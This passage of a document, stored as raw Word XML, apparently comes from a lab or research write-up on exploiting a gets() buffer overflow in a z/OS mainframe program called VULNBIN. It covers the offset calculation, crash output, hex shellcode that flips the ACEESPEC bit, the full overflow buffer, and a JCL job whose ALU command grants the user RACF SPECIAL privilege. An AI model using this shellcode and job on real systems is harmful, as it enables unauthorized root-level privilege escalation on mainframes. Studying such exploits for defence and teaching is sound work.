        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; subroutine entry point (register 15)</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1FABC25C.  1FB35840</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1FABC260.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1FABC2E0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=&gt; pointer to first parameter (register 1)</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1FABC264.  1FAB1C20</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1FABC268.  1FA86BC8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1FABC26C.  1FABC324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1FABC270.  00040938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1FABC274.  1FAB1360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1FABC278.  1FAF0F20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1FABC27C.  1FABC2F8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1FABC280.  00040968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1FABC284.  1FB31858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1FABC288.  86103978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1FABC28C.  1FAB71D8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1FABC290.  00000000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1FABC294.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FABC748</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; gets() DSA pointer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is key to note that at this point the DSA for gets() has not yet been created, rather, we are showing the DSA of the module is calling gets(). To put a breakpoint within gets() would mean that any program on the mainframe which calls gets() would enter into debugging mode which is clearly not desirable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The way that parameters for subroutines are stored is through an array of pointers, whereby register 1 stores a pointer to the head of the array, and each contiguous entry in the array is a pointer to the corresponding parameter value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parameters are stored with an array of pointers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5425440" cy="3943350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Image2" descr="A diagram representing how parameter lists are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diagram representing how parameter lists are structured:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5425440" cy="3943350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Register 1 contained the pointer 1FABC2E0, which pointed to the parameter 1 pointer at 1FABC324. Since gets() only contains a single parameter — a pointer to the buffer where the string will be stored — we know that 1FABC324 must be the start of the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The breakpoint was reached after the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“Enter an argument:”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt, so we know that gets() is most likely called when the user enters the argument here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finally, we know where the gets() DSA will be stored as the Next Available Byte points to 1FABC748.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Representation of memory at the breakpoint:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5848350" cy="2095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848350" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We can also infer the structure of memory after the gets() DSA has been created based on our knowledge of data stored at each offset in DSAs (see table above).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Representation of memory once the gets() DSA is created:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6153150" cy="20383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53150" cy="2038350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Crashing the Program </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The next step is now to try and put this information together to try and crash the program by overwriting the gets() DSA pointer with data from the buffer that we write. If we calculate the number of bytes between the start of the buffer and the gets() DSA pointer, we see that there are 1060 bytes between the two.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x1FABC748 - 0x1FABC324 = 0x424 = 1060 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In theory if we write 1060 bytes to go to the start of the gets() DSA, then another 4 bytes to align ourselves at the start of the pointer to the previous DSA, we can overwrite this pointer with a final set of 4 bytes to crash the program (i.e. we need to write 1060 + 4 + 4 = 1068 bytes). In the buffers we try to use letters that are not likely to appear in the program so that we can easily separate what we have injected from what is usually in memory; using a different set of 4 bytes for the final part of the buffer is also useful since we can be sure that the end of the buffer is aligned correctly, rather than being too far over the intended address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LGBT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[...1060 bytes later...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KALE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Result of writing the above buffer into VULNBIN:</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CEE0374C CONDITION=CEE3204S TOKEN=00030C84 59C3C5C5 00000000</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WHILE RUNNING PROGRAM CEEEV003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AT THE TIME OF INTERRUPT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PSW     078D0400 85C497FA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GPR 0-3 00000020 1FA2ED60 1FA2B098 05C49806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GPR 4-7 00000000 1FA2B098 1FA35324 1FA366AC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GPR 8-B 00000000 00000020 00001388 1FAAFD51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GPR C-F 1FA301D8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">D2C1D3C5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FAAEA51 1FA35324</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IEF472I VULNJOB STEP01 - COMPLETION CODE - SYSTEM=000 USER=4083 REASON=00000004</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note: z/OS uses EBCDIC encoding rather than ASCII, so LGBT = 0xD3C7C2E3 and KALE = 0xD2C1D3C5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Register 13 (0xD) contains 0xD2C1D3C5 — the last 4 bytes of the buffer — so we can be reasonably sure that we have aligned the end of the buffer with the correct position in the gets() DSA as intended. This shows us that the program is definitely exploitable as we have crashed it with error code U4083 and reason code 0x04 which means that z/OS is confused by the address stored in R13 since 0xD2C1D3C5 is not a valid address and hence thinks that the DSA is mis-aligned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The state of memory when we have crashed the program:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="191897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943600" cy="1918970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploiting the Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rather than simply crashing the program, it would be good to try and do privilege escalation to make ourselves the equivalent of ‘root’ which is SPECIAL in z/OS. To accomplish this, we will essentially create our own DSA that has a return address to some malicious shellcode, and then point the gets() ‘previous DSA’ pointer to our DSA instead of the original caller’s DSA, thereby executing the payload once gets() returns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since we do not care about bytes 0x00 to 0x0C in the returning DSA, we can replace ‘KALE’ with the address 12 bytes before our buffer (0x1FABC324 – 0xC = 0x1FABC318). This will mean that offset +0x00 in our buffer should contain a pointer to the return address for our DSA. This can point to anywhere in memory where we have control over and have injected the payload but for the sake of simplicity, we will make the first 4 bytes of the buffer contain the address corresponding to 4 bytes after where the buffer starts (0x1FABC324 + 0x4 = 0x1FABC328).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finally, we can write our compiled shellcode starting from offset +0x04 in the buffer — here is compiled shellcode to flip the ACEESPEC bit which will allow any tasks in the current job to be run as ‘SPECIAL’:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xA718003C0A6B585002245855006C585500C89400502696B1502617FF07FC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once the ACEESPEC bit is flipped by executing this shell code, we can add a step in the original JCL program to give ourselves SPECIAL — we use the parameter COND=EVEN because we want this last step to be run even if the previous one ABENDs (i.e. terminates abnormally).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Final state of the memory after the overflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6076950" cy="19240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6076950" cy="1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finished JCL program:</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//VULNJOB  JOB 'VULNJOB',NOTIFY=BASC8,REGION=0M,</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MSGCLASS=H,MSGLEVEL=(1,1)</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//STEP01    EXEC PGM=VULNBIN</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//STEPLIB   DD DSN=PDS.APFLIB,DISP=SHR</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//SYSIN     DD  DSN=LBASC8.BASCA8.BUFF(ACEE),DISP=SHR</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//SYSOUT    DD  SYSOUT=*</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//SYSPRINT  DD  SYSOUT=*</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//STEP02    EXEC PGM=IKJEFT01,COND=EVEN</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//STEPLIB   DD  DSN=SYS1.LINKLIB,DISP=SHR</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//SYSTSPRT  DD  SYSOUT=A</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//SYSPRINT  DD  SYSOUT=*</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//SYSTSIN   DD  *</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ALU BASC8 SPECIAL</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FABC328A718003C0A6B585002245855006C585500C89400502696B1502617FF07FC[LGBT for 1030 bytes]1FABC318</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When running the JCL program, we see that after the initial prompt where we inject our buffer, we run the ALU (ALter User) command to grant ourselves SPECIAL outside of just this job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
